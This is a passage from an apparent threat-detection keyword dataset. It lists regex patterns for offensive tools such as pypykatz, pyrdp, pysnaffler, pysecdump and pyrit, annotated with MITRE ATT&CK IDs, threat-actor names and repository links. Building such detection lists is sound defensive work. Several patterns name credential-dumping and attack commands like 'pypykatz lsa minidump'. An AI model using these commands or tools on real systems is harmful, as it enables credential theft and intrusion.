T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - 
Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CodeXTF2/Burp2Malleable","1","1","N/A","N/A","10","10","385","34","2023-04-06T15:24:12Z","2022-08-14T18:05:39Z","55989" "*pymultitor*",".{0,1000}pymultitor.{0,1000}","offensive_tool_keyword","pymultitor","Python Multi Threaded Tor Proxy. Did you ever want to be at two different places at the same time? When I asked myself this question. I actually started developing this solution in my mind. While performing penetration tests there are often problems caused by security devices that block the attacking IP","T1071.001 - T1071.004 - T1055.008","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/realgam3/pymultitor","1","0","N/A","N/A","N/A","6","572","107","2024-02-25T20:40:50Z","2013-09-28T15:55:49Z","55990" "*pyobfuscate = (*",".{0,1000}pyobfuscate\s\=\s\(.{0,1000}","offensive_tool_keyword","pyobfuscate","ADVANCED PYTHON OBFUSCATOR","T1027 - T1027.009","TA0005","N/A","N/A","Defense Evasion","https://pyobfuscate.com/pyd","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A","55991" "*pypykatz *",".{0,1000}pypykatz\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","55992" "*pypykatz lsa minidump 
*",".{0,1000}pypykatz\slsa\sminidump\s.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","55993" "*pypykatz lsa minidump*",".{0,1000}pypykatz\slsa\sminidump.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privileged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","55994" "*pypykatz lsa minidump*",".{0,1000}pypykatz\slsa\sminidump.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","55995" "*pypykatz not installed*",".{0,1000}pypykatz\snot\sinstalled.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","55996" "*pypykatz.commons*",".{0,1000}pypykatz\.commons.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","55997" "*pypykatz.dpapi*",".{0,1000}pypykatz\.dpapi.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in 
pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","55998" "*pypykatz.exe*",".{0,1000}pypykatz\.exe.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","55999" "*pypykatz.git*",".{0,1000}pypykatz\.git.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","56000" "*pypykatz.kerberos*",".{0,1000}pypykatz\.kerberos.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","56001" "*pypykatz.lsadecryptor*",".{0,1000}pypykatz\.lsadecryptor.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","56002" "*pypykatz.py*",".{0,1000}pypykatz\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential 
Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","56003" "*pypykatz.pypykatz*",".{0,1000}pypykatz\.pypykatz.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","56004" "*pypykatz.pypykatz*",".{0,1000}pypykatz\.pypykatz.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","N/A","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","56005" "*pypykatz.registry*",".{0,1000}pypykatz\.registry.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","56006" "*pypykatz.zip*",".{0,1000}pypykatz\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","56007" "*pypykatz_handler.py*",".{0,1000}pypykatz_handler\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - 
TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","56008" "*pypykatz_rekall.py*",".{0,1000}pypykatz_rekall\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","56009" "*pypykatzClass*",".{0,1000}pypykatzClass.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","56010" "*pypykatzfile*",".{0,1000}pypykatzfile.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","56011" "*pypykatz-master.zip*",".{0,1000}pypykatz\-master\.zip.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","56012" "*Pyramid-main.zip*",".{0,1000}Pyramid\-main\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense 
Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","56013" "*pyrdp.core.mitm*",".{0,1000}pyrdp\.core\.mitm.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#content","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","56014" "*pyrdp.enum.rdp*",".{0,1000}pyrdp\.enum\.rdp.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#content","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","56015" "*pyrdp.logging.log*",".{0,1000}pyrdp\.logging\.log.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#content","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","56016" "*pyrdp.parser.rdp*",".{0,1000}pyrdp\.parser\.rdp.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#content","can also be used by blueteam as a 
honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","56017" "*pyrdp_output -*",".{0,1000}pyrdp_output\s\-.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","56018" "*pyrdp_scapy.py*",".{0,1000}pyrdp_scapy\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","56019" "*pyrdp-clonecert.py*",".{0,1000}pyrdp\-clonecert\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","56020" "*pyrdp-convert.py*",".{0,1000}pyrdp\-convert\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","56021" "*pyrdp-mitm 
*",".{0,1000}pyrdp\-mitm\s.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","56022" "*pyrdp-mitm.py*",".{0,1000}pyrdp\-mitm\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","56023" "*pyrdp-player.py*",".{0,1000}pyrdp\-player\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","56024" "*pyrit -e * create_essid*",".{0,1000}pyrit\s\-e\s.{0,1000}\screate_essid.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","56025" "*pyrit -i *.txt 
import_passwords*",".{0,1000}pyrit\s\-i\s.{0,1000}\.txt\simport_passwords.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","56026" "*pyrit -r *.pcap attack_db*",".{0,1000}pyrit\s\-r\s.{0,1000}\.pcap\sattack_db.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","56027" "*pyrit -r *.pcap -b * -i *.txt attack_passthrough*",".{0,1000}pyrit\s\-r\s.{0,1000}\.pcap\s\-b\s.{0,1000}\s\-i\s.{0,1000}\.txt\sattack_passthrough.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","56028" "*PyroTek3/PowerShell-AD-Recon*",".{0,1000}PyroTek3\/PowerShell\-AD\-Recon.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","56029" "*pysecdump -*",".{0,1000}pysecdump\s\-.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","0","N/A","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","56030" "*pysecdump v%s *",".{0,1000}pysecdump\sv\%s\s.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","0","#content","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","56031" "*pysecdump.exe*",".{0,1000}pysecdump\.exe.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","1","N/A","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","56032" "*pysecdump.py*",".{0,1000}pysecdump\.py.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","1","N/A","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","56033" "*pysecdump: Starting 
shell*",".{0,1000}pysecdump\:\sStarting\sshell.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","0","#content","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","56034" "*pysnaffler -*",".{0,1000}pysnaffler\s\-.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","56038" "*pysnaffler 'smb2+kerberos+password:*",".{0,1000}pysnaffler\s\'smb2\+kerberos\+password\:.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","56039" "*pysnaffler 'smb2+ntlm-nt://*",".{0,1000}pysnaffler\s\'smb2\+ntlm\-nt\:\/\/.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. 
Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","56040" "*pysnaffler 'smb2+ntlm-password://*",".{0,1000}pysnaffler\s\'smb2\+ntlm\-password\:\/\/.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","56041" "*pysnaffler.whatif:main*",".{0,1000}pysnaffler\.whatif\:main.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","56042" "*pysnaffler/_version.py*",".{0,1000}pysnaffler\/_version\.py.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. 
Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","56043" "*pysnaffler-main*",".{0,1000}pysnaffler\-main.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","1","N/A","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","56044" "*pysoserial.py*",".{0,1000}pysoserial\.py.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Resource Development","https://github.com/aStrowxyu/Pysoserial","1","1","N/A","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z","56045" "*Pysoserial-main*",".{0,1000}Pysoserial\-main.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Resource Development","https://github.com/aStrowxyu/Pysoserial","1","1","N/A","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z","56046" "*pysoxy-master*",".{0,1000}pysoxy\-master.{0,1000}","offensive_tool_keyword","pysoxy","A small Socks5 Proxy Server in 
Python","T1090","TA0011","N/A","N/A","C2","https://github.com/MisterDaneel/pysoxy","1","0","N/A","N/A","10","10","149","51","2023-10-15T06:12:45Z","2016-04-21T07:56:24Z","56047" "*PySplunkWhisperer2*",".{0,1000}PySplunkWhisperer2.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0004 - TA0003 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","N/A","9","10","250","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z","56048" "*pysqlrecon.db*",".{0,1000}pysqlrecon\.db.{0,1000}","offensive_tool_keyword","PySQLRecon","Offensive MSSQL toolkit written in Python, based off SQLRecon","T1040 - T1078 - T1072 - T1223 - T1059 - T1213","TA0001 - TA0002 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Tw1sm/PySQLRecon","1","0","N/A","N/A","10","3","201","15","2025-01-12T02:14:59Z","2023-09-03T01:14:35Z","56049" "*pysqlrecon.lib*",".{0,1000}pysqlrecon\.lib.{0,1000}","offensive_tool_keyword","PySQLRecon","Offensive MSSQL toolkit written in Python, based off SQLRecon","T1040 - T1078 - T1072 - T1223 - T1059 - T1213","TA0001 - TA0002 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Tw1sm/PySQLRecon","1","0","N/A","N/A","10","3","201","15","2025-01-12T02:14:59Z","2023-09-03T01:14:35Z","56050" "*pysqlrecon.logger*",".{0,1000}pysqlrecon\.logger.{0,1000}","offensive_tool_keyword","PySQLRecon","Offensive MSSQL toolkit written in Python, based off SQLRecon","T1040 - T1078 - T1072 - T1223 - T1059 - T1213","TA0001 - TA0002 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Tw1sm/PySQLRecon","1","0","N/A","N/A","10","3","201","15","2025-01-12T02:14:59Z","2023-09-03T01:14:35Z","56051" "*pystinger_for_darkshadow*",".{0,1000}pystinger_for_darkshadow.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using 
webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - 